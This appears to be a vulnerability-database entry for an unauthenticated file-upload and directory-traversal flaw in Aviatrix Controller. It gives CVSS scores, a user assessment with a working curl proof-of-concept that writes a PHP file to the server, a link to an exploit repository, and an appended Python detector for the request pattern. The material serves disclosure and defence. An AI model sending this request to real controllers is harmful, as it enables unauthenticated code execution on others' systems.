CVSS2
Attack Vector: NETWORK
Attack Complexity: LOW
Authentication: NONE
Confidentiality Impact: PARTIAL
Integrity Impact: PARTIAL
Availability Impact: PARTIAL
AV:N/AC:L/Au:N/C:P/I:P/A:P
CVSS3
Attack Vector: NETWORK
Attack Complexity: LOW
Privileges Required: NONE
User Interaction: NONE
Scope: UNCHANGED
Confidentiality Impact: HIGH
Integrity Impact: HIGH
Availability Impact: HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
AI Score
Confidence: High
EPSS
Percentile: 99.2%
An issue was discovered in Aviatrix Controller 6.x before 6.5-1804.1922. Unrestricted upload of a file with a dangerous type is possible, which allows an unauthenticated user to execute arbitrary code via directory traversal.
Recent assessments:
JoyGhoshs at October 09, 2021 6:33am UTC reported:
This vulnerability allows an attacker to create and store files on the Aviatrix controller. The exploitation phase doesn't need any user authentication or require any other user's interaction; it can simply be exploited using curl. Here is one example.
curl -k https://aviatrix.domain.tld/v1/backend1 -d CID=x -d action=set_metric_gw_selections -d account_name=/../../../var/www/php/poc.php -d 'data=hello<?php echo "Vulnerable Poc";?>'
# after executing the previous command if the target is vulnerable this will create a php file on this path
https://vulnerable.target.com/v1/poc
An attacker can do this unauthenticated because many API calls do not enforce a check for authentication. So this allows an unauthenticated attacker to upload arbitrary files, including .php scripts, to the filesystem.
Or you can use this exploit to do the exploitation more easily: <https://github.com/JoyGhoshs/CVE-2021-40870>
Assessed Attacker Value: 3
Assessed Attacker Value: 5
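For defenders, the request pattern described in the assessment above (a POST to /v1/backend1 whose account_name carries a path) can be flagged in proxy or WAF records. The following is an added example, not code from the original page or from Aviatrix; the record layout, the extension list and the sample records are assumptions constructed for illustration.

```python
from urllib.parse import parse_qs, unquote

ENDPOINT = "/v1/backend1"                  # endpoint named in the assessment
SCRIPT_EXTS = (".php", ".phtml", ".phar")  # assumed server-executable types

# Constructed records (method, path, form body); the layout is an assumption
# about what a body-logging reverse proxy or WAF would hand to this check.
SAMPLE_RECORDS = [
    ("POST", "/v1/backend1", "CID=abc123&action=list_accounts"),
    ("POST", "/v1/backend1",
     "CID=x&action=set_metric_gw_selections&account_name=prod-aws&data=cpu"),
    ("POST", "/v1/backend1",
     "CID=x&action=set_metric_gw_selections"
     "&account_name=%2F..%2F..%2F..%2Fvar%2Fwww%2Fphp%2Fpoc.php&data=hello"),
    ("POST", "/v1/backend1",
     "CID=x&action=set_metric_gw_selections"
     "&account_name=%252e%252e%255cvar%252fwww%252fphp%252fa.PHP&data=x"),
]


def decode_fully(value, rounds=3):
    """Undo nested percent-encoding so %252e%252e is still seen as '..'."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def findings(method, path, body):
    """Return the reasons a request matches the traversal-upload pattern."""
    if method != "POST" or path.split("?")[0].rstrip("/") != ENDPOINT:
        return []
    reasons = set()
    for raw in parse_qs(body, keep_blank_values=True).get("account_name", []):
        name = decode_fully(raw).replace("\\", "/")
        if ".." in name.split("/"):
            reasons.add("traversal sequence in account_name")
        if name.startswith("/"):
            reasons.add("absolute path in account_name")
        if name.lower().endswith(SCRIPT_EXTS):
            reasons.add("script extension in account_name")
    return sorted(reasons)


def scan(records):
    """Map record index -> reasons, for flagged records only."""
    return {i: r for i, rec in enumerate(records) if (r := findings(*rec))}
```

Calling scan(SAMPLE_RECORDS) returns only the two constructed traversal records; upgrading to 6.5-1804.1922 or later remains the fix stated in the advisory text.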